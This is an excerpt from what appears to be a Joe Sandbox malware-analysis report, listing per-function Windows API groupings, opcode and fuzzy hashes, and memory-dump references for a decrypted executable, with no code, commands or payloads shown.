                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsdupfreewcsncpy$Value
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1554701960-0
                                                                                                                                                                                                          • Opcode ID: eae06682ae28bc4f435427b58f7a54a08f3b8b88289e45f38b0b7b827e51cabb
                                                                                                                                                                                                          • Instruction ID: da1d114085ca4aa9233c1495fb0579f216bdf29e57c82a9bb0fca7f891cc91e6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eae06682ae28bc4f435427b58f7a54a08f3b8b88289e45f38b0b7b827e51cabb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapLongProcessVisible
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 684997728-0
                                                                                                                                                                                                          • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                                                                                                                                                                          • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProcSleep
                                                                                                                                                                                                          • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                                                                                                                                                                          • API String ID: 938261879-1339284965
                                                                                                                                                                                                          • Opcode ID: 315e644546469fd2db35d0db39a019d67f841a3b1ec84ab54f403295059e202d
                                                                                                                                                                                                          • Instruction ID: b5645326e5d4f07ede329690aacabb45cf3e43243987f71da7b0cd1098b1f21b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 315e644546469fd2db35d0db39a019d67f841a3b1ec84ab54f403295059e202d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4118F3120874585EB5ADF57A8843E973A0EB8CBD0F488029AB0A0B666EF3AC595C740
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$CurrentThread$EnableEnumWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2527101397-0
                                                                                                                                                                                                          • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                                                                                                                                                                          • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Value$AllocateHeap$Alloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2511646910-0
                                                                                                                                                                                                          • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                                                                                                                                                                          • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AllocateHeap$EnterInitializeLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2823868979-0
                                                                                                                                                                                                          • Opcode ID: 9401c8691c50f740a847db88c587e37cfc3cc7e6b1d7d2a34aa6e1dd6b61c51d
                                                                                                                                                                                                          • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9401c8691c50f740a847db88c587e37cfc3cc7e6b1d7d2a34aa6e1dd6b61c51d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 458812214-0
                                                                                                                                                                                                          • Opcode ID: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
                                                                                                                                                                                                          • Instruction ID: 37a7c27cb33ea643b241ae4d06e82751f63dd7a6f22fff0809f2f79c8fcd043f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E21FD76204B0081EB06DB12E8943E973A4FB8CBC4F988126EB8D477B9DF39C906C300
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3171405041-0
                                                                                                                                                                                                          • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                                                                                                                                                                          • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                          • Opcode ID: d3cebf725d949ebbd98cb9ef7f68bda467ea1853d0e4d33e0ea42ea6cb49cd70
                                                                                                                                                                                                          • Instruction ID: a94d66f0502d68e3f48ed78985175dce6facf9e9c189752d3e598d0e8768336a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3cebf725d949ebbd98cb9ef7f68bda467ea1853d0e4d33e0ea42ea6cb49cd70
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2231F1B271064081FB16DA2BF4507ED6752E7DDBD0F848126EB1A87BAACE3EC542C740
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $ $header crc mismatch
                                                                                                                                                                                                          • API String ID: 0-4092041874
                                                                                                                                                                                                          • Opcode ID: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
                                                                                                                                                                                                          • Instruction ID: 7b7c0dcb7b367ac831aed03830ec8ef67ea91f0dce79e30e5349fd19ccede3bc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6B1A4726002D48BE7A79B16C488BAE3BEAFB4CB94F164518FB854B3E1D775C940C740
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Heapwcsncpy$AllocateFree
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2817115924-0
                                                                                                                                                                                                          • Opcode ID: 148ba3b1c52b5aa1fd378a7d38282354f494ce16b4f038740f7610afa5151547
                                                                                                                                                                                                          • Instruction ID: b6b9e846c04cb6e9a04139aff3d7e83eda40acee9614ff25bed0c888bce5a2ba
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 148ba3b1c52b5aa1fd378a7d38282354f494ce16b4f038740f7610afa5151547
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3651B2B2B0068485EA66DF26A404BEA77E1F789BD4F588125EF5D477E5EB3CC542C300
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateCriticalHeapSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3625150316-0
                                                                                                                                                                                                          • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                                                                                                                                                                          • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: $ $invalid stored block lengths
                                                                                                                                                                                                          • API String ID: 3510742995-1718185709
                                                                                                                                                                                                          • Opcode ID: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
                                                                                                                                                                                                          • Instruction ID: c92309fc0d38d6234d0408f55a04ce57e81ba093b92e9b8f78a366b710634dd8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F041AC726107A09BE7668F26C4847AD3BA9F70C7C4F215129FF4A4BBA4D735D890CB40
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: EntryFunctionLookup$UnwindVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3286588846-0
                                                                                                                                                                                                          • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                                                                                                                                                                          • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateHeapmemsetwcscpywcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2037025450-0
                                                                                                                                                                                                          • Opcode ID: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
                                                                                                                                                                                                          • Instruction ID: 6743f53f77a36836f55a7605488c5dfe466d4e7a0e85049e430ca513693cbf19
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D3109B5605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518350
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Heap$Free$Allocate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3472947110-0
                                                                                                                                                                                                          • Opcode ID: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
                                                                                                                                                                                                          • Instruction ID: 5bc8d6a19ab5820ea12ddcb4c1614eb0e390fbda2a9c6e8bfd6285e08278190a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B73142B2211B409BE702DF13EA807A977A4F788BC0F448429EB4847B65DF79E4A6C740
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharLower
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1615517891-0
                                                                                                                                                                                                          • Opcode ID: aabfa1885bbcdd7278eb26932432713e72225ea50af0810a3f1a86d8e5eb4003
                                                                                                                                                                                                          • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aabfa1885bbcdd7278eb26932432713e72225ea50af0810a3f1a86d8e5eb4003
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWidemalloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2735977093-0
                                                                                                                                                                                                          • Opcode ID: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
                                                                                                                                                                                                          • Instruction ID: eb7332db7f165f027367f4732026c4c5e1ffc84dd66e6814e4cbb0aaa670ffe8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C216532208B8086D725CF16B44079AB7A5F7887E4F488725FF9917BA5DF79C551C700
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateCriticalHeapSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3625150316-0
                                                                                                                                                                                                          • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                                                                                                                                                                          • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4012708801-0
                                                                                                                                                                                                          • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
